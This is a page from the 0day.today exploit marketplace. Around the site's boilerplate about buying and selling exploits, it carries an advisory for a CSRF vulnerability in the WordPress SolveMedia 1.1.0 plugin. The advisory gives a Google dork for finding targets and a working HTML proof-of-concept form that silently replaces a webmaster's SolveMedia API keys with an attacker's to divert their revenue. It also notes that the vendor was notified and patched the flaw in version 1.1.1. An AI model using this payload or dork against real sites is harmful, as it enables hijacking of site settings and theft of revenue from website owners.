0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WordPress SolveMedia 1.1.0 CSRF Vulnerability
# Exploit Title: WordPress SolveMedia 1.1.0 CSRF Vulnerability # Release Date: 24/01/13 # Author: Junaid Hussain - [ illSecure Research Group ] - # Contact: illSecResearchGroup@Gmail.com | Website: http://illSecure.com # Software Link: http://downloads.wordpress.org/plugin/solvemedia.1.1.0.zip # Vendor Homepage: http://solvemedia.com # Tested on: CentOs 5 # Google Dork: inurl:wp-content/plugins/solvemedia ----------------------------------------------------------------------------------------------------------------------- //##### Introduction: SolveMedia is a capatcha service that allows webmasters to monetize from correct captcha type-ins, solvemedia.admin.inc is vulnerable to CSRF, there is no anti-CSRF tokens implemented nor is the wp-nonce function used, therefore an attacker can change the webmasters SolveMedia API Keys (public key, private key, hash key) to the attackers own set of API keys thus stealing the webmasters SolveMedia revenue. ------------------------------------------------------------------------------------------------------------------------- //##### CSRF - Proof Of Concept: <html> <form method="post" action="http://illsecure.com/wp-admin/plugins.php?page=solvemedia/solvemedia.admin.inc&updated=true"> <input name="adcopy_opt_pubkey" id="adcopy_opt_pubkey" size="40" value="[ ATTACKERS PUBLIC KEY ]" style="display:none;"/> <input name="adcopy_opt_privkey" id="adcopy_opt_privkey" size="40" value="[ ATTACKERS PRIVATE KEY ]" style="display:none;"/> <input name="adcopy_opt_hashkey" id="adcopy_opt_hashkey" size="40" value="[ ATTACKERS HASH KEY ]" style="display:none;" /> <input type="submit" name="submit" value="Enter" /> </form> </html> \\##### End Poc ##### ------------------------------------------------------------------------------------------------------------------------- //##### Patch: -- Vendor was notified on the 22/01/2013 -- Vendor released version 1.1.1 on 23/01/2013 which included a patch --- Patched Version (1.1.1): http://wordpress.org/extend/plugins/solvemedia/ --- ChangeLog: http://wordpress.org/extend/plugins/solvemedia/changelog/ ------------------------------------------------------------------------------------------------------------------------- //##### Original: http://illSecure.com/code/Wordpress-SolveMedia-CSRF-Vulnerability.txt # 0day.today [2024-12-25] #